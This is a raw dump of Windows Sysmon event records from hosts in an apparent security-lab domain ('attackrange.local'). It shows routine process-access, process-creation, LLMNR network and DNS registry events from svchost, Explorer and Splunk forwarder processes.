07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104564Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104563Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104562Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104561Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104560Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104559Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104558Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104557Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104556Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104555Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104554Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:33.215{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104600Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:34.918{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=027460634E9CCF0890731F0099D90693,SHA256=D1799412C898CA8D6B5B3A7941E6C10A1168C0F5EC23D494AE74FA786ABF7B3C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082495Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:34.961{2FDD8D40-B3B2-615A-6F01-00000000FD01}35123076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082494Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:34.648{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B3B2-615A-6F01-00000000FD01}3512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082493Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:34.648{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082492Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:34.648{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082491Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:34.648{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082490Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:34.648{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082489Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:34.648{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082488Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:34.648{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082487Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:34.648{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082486Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:34.648{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082485Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:34.648{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082484Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:34.648{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B3B2-615A-6F01-00000000FD01}3512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082483Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:34.648{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B3B2-615A-6F01-00000000FD01}3512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082482Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:34.651{2FDD8D40-B3B2-615A-6F01-00000000FD01}3512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082481Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:34.586{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=140AE89BD77A629436EC3D4800DB2CD2,SHA256=A81B998E445C7C277A30448FFFB1DA24A58922A8FAE4EC8347084B1C450B9AFC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104599Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:32.287{58E9C193-ACA8-615A-1500-00000000FC01}1128C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:98d0:cb7e:b94:ffff-60059-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x8000000000000000104598Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:32.287{58E9C193-ACA8-615A-1500-00000000FC01}1128C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local60059-trueff02:0:0:0:0:0:1:3-5355llmnr 13241300x8000000000000000104597Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:34.074{58E9C193-ACA8-615A-1500-00000000FC01}1128C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{03B2B8E3-95E6-43E5-B0D9-DAF9FE2D5587}\RegisteredSinceBootDWORD (0x00000001) 13241300x8000000000000000104596Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:34.074{58E9C193-ACA8-615A-1500-00000000FC01}1128C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{03B2B8E3-95E6-43E5-B0D9-DAF9FE2D5587}\StaleAdapterDWORD (0x00000000) 13241300x8000000000000000104595Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:34.074{58E9C193-ACA8-615A-1500-00000000FC01}1128C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{03B2B8E3-95E6-43E5-B0D9-DAF9FE2D5587}\CompartmentIdDWORD (0x00000001) 13241300x8000000000000000104594Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 